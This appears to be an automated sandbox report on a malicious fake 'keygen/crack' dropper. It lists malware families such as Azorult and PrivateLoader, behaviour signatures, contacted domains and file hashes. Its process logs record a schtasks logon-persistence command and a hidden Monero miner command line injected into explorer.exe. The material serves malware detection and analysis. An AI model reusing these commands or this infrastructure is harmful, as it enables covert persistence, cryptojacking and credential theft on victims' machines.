Analysis Overview
SHA256
813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
Threat Level: Known bad
The file 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46 was found to be: Known bad.
Malicious Activity Summary
FFDroider
Ffdroider family
Pony,Fareit
Fabookie family
Pony family
Azorult family
Azorult
Onlylogger family
Detect Fabookie payload
Fabookie
Gcleaner family
Privateloader family
GCleaner
PrivateLoader
OnlyLogger
FFDroider payload
OnlyLogger payload
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Unsecured Credentials: Credentials In Files
Deletes itself
Reads user/profile data of web browsers
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook accounts
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Checks whether UAC is enabled
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
Enumerates physical storage devices
Unsigned PE
Program crash
System Location Discovery: System Language Discovery
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Runs ping.exe
Checks SCSI registry key(s)
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 22:29
Signatures
Azorult family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
134s
Command Line
Signatures
Azorult
Azorult family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | kvaka.li | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4376-0-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2264 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2264 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2264 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2264 wrote to memory of 2776 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104977 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
Files
memory/2264-0-0x0000000000360000-0x0000000000445000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
memory/2776-12-0x00000000000F0000-0x00000000001D5000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4768 set thread context of 4092 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1392
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 544 -ip 544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 352
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4612 -ip 4612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1148
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | startupmart.bar | udp |
| RU | 186.2.171.3:80 | 186.2.171.3 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | best-supply-link.xyz | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| RU | 186.2.171.3:443 | 186.2.171.3 | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 172.67.149.76:443 | 2no.co | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.171.2.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.149.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cleaner-partners.biz | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | gensolutions.bar | udp |
| US | 8.8.8.8:53 | 2no.co | udp |
| US | 104.21.79.229:443 | 2no.co | tcp |
| SG | 37.0.10.214:80 | tcp | |
| US | 8.8.8.8:53 | 229.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| SG | 37.0.10.244:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 163.172.171.111:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| PL | 54.37.232.103:14433 | xmr-eu1.nanopool.org | tcp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | 111.171.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.232.37.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| MX | 31.210.20.251:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| UA | 194.145.227.161:80 | tcp | |
| US | 8.8.8.8:53 | qwertys.info | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | qwertys.info | udp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
| MD5 | 7126148bfe5ca4bf7e098d794122a9a3 |
| SHA1 | 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64 |
| SHA256 | f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5 |
| SHA512 | 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
| MD5 | 8902f8193024fa4187ca1aad97675960 |
| SHA1 | 37a4840c9657205544790c437698b54ca33bfd9d |
| SHA256 | 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f |
| SHA512 | c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938 |
memory/3944-33-0x00000000727CE000-0x00000000727CF000-memory.dmp
memory/3944-34-0x0000000000DF0000-0x0000000000FC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
memory/1772-57-0x00000000004B0000-0x00000000004C0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
memory/636-61-0x0000000000690000-0x00000000006B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/3872-73-0x00000000001D0000-0x00000000001D8000-memory.dmp
memory/636-79-0x0000000000E40000-0x0000000000E5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
